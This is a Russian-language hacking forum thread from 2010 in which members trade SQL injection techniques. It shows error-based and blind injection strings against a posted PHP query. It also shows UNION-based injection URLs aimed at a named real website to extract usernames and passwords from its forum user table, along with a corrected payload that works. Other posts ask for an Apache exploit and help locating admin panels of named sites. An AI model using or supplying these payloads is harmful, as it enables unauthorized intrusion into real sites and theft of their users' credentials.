01.10.2010, 23:19
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Сообщение от lukmus
/path/to/script?id=
Код:
if ($id){
#Fields that can be viewed only.
$sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, ";
$sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, ";
$sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date ";
$sql .= "FROM table1 p1, table2 p2 WHERE ";
$sql .= "p1.id = p2.id AND p1.id = '$id'";
$result = mysql_query($sql);
...
mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]to[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]script[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]' or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--[/COLOR][/COLOR]
только подзапросы поддерживаться не будут.
|
|
|
01.10.2010, 23:24
|
|
Новичок
Регистрация: 20.01.2010
Сообщений: 4
С нами:
8582262
Репутация:
0
|
|
люди можете помочь наити експлоит под апаче версии 1.3.36 спасибо
|
|
|
|
02.10.2010, 02:08
|
|
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
С нами:
8674045
Репутация:
214
|
|
Сообщение от -PRIVAT-
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]to[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]script[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]' or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--[/COLOR][/COLOR]
только подзапросы поддерживаться не будут. я не очень понимаю твою мысль, как по твойму будет выглядеть запрос к БД и каким образом это обойдет ковычки?
по-мойму запрос будет такой:
Код:
SELECT bla,bla,bla FROM table1 p1, table2 p2 WHERE p1.id = p2.id AND p1.id = '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'
и запрос ничего не вернет т.к. нет такого поле, где id равно строке '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'
|
|
|
|
02.10.2010, 03:10
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Верный запрос:
Код:
1'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1 -- a
Но не в этом суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.
Все поля из таблиц вытащить не удастся. Вытащить можно только те поля, которые участвуют в запросе, так как нельзя использовать объединение запросов через union.
Все что можно сделать это:
Код:
1'+and+ascii(substring(password,1,1))>66 -- a
Код:
1'+and+substring(password,1,1)='f' -- a
По тому куску кода, что ты выложил, что и как фильтруется сказать нельзя. |
|
|
|
02.10.2010, 03:24
|
|
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
С нами:
8674045
Репутация:
214
|
|
Сообщение от Redwood
Верный запрос:
Код:
1'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1 -- a
Но не в этом не суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу. я так не думаю т.к. уже вытащил пол таблицы методом слепой скули а-ля:
Код:
id=1+AND+128>ascii(mid(column,1,1))
фишка в том, как вы понимаете, что вытащить можно хоть все поля всех записей из нужной таблицы, если данный запрос уязвим.
Здесь вообще речь не об этом, а о том как обойти эти кавычки. Код скрипта обработчика я привел, но каким-то макаром если я подставляю ковычку в
на странице все равно верный результат т.е. кавычка как-то фильтруется, так вот как она фильтруется и как это обойти?
|
|
|
|
02.10.2010, 12:27
|
|
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами:
8338646
Репутация:
0
|
|
http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6 ,7,8,9,10+from+vbbusers+--+
чё не так делаю?
|
|
|
|
02.10.2010, 12:47
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от KandidaT'S
http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6 ,7,8,9,10+from+vbbusers+--+
чё не так делаю?
http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,3,4,5,6,7,8,9,10+from+vbb _users--+
_ потерял...смотри внимательнее как табла называется
и с какого перепугу ты колонку тоже неправильно написал? версия 5 , выводи все правильно...
http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2, name,pwd,5,6,7,8,9,10+from+vbb_users--+
|
|
|
|
02.10.2010, 13:00
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
Тож смотрю на дамп и не вижу такой таблици. Вот если нужно дамп структуры - http://rghost.ru/2790176
|
|
|
|
02.10.2010, 13:35
|
|
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами:
8338646
Репутация:
0
|
|
a где там админка форума?)
|
|
|
|
02.10.2010, 13:43
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
С нами:
8452680
Репутация:
0
|
|
Помогите найти админку www.ealandmania.net
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
